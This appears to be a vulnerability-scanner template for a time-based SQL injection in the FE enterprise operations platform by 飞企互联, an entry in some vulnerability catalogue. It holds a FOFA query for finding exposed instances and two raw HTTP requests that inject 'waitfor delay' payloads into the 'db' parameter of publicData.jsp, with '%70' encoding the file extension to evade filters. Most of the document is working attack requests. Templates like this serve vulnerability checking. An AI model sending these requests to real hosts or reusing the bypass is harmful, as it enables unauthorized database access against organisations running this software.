## id: VEID-2024-0210
## name: 飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2024
## description:FE企业运营管理平台前台存在sql注入
## fofa-query: app="FE-协作平台" , app="飞企互联-FE企业运营管理平台"
## verification: true


GET /oaerp/ui/common/publicData.js%70?type=getAllTableInfo&db=';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 5
#@ matcher: status_code == 200

---
GET /oaerp/ui/common/publicData.js%70?type=getAllTableInfo&db=';waitfor+delay+'0:0:8'-- HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 8
#@ matcher: status_code == 200



# @VEIL-STAMP: d3feb9ad163a1d8ccd9fe487146c3dc20930e109682931dd494a22a4e9a2113b
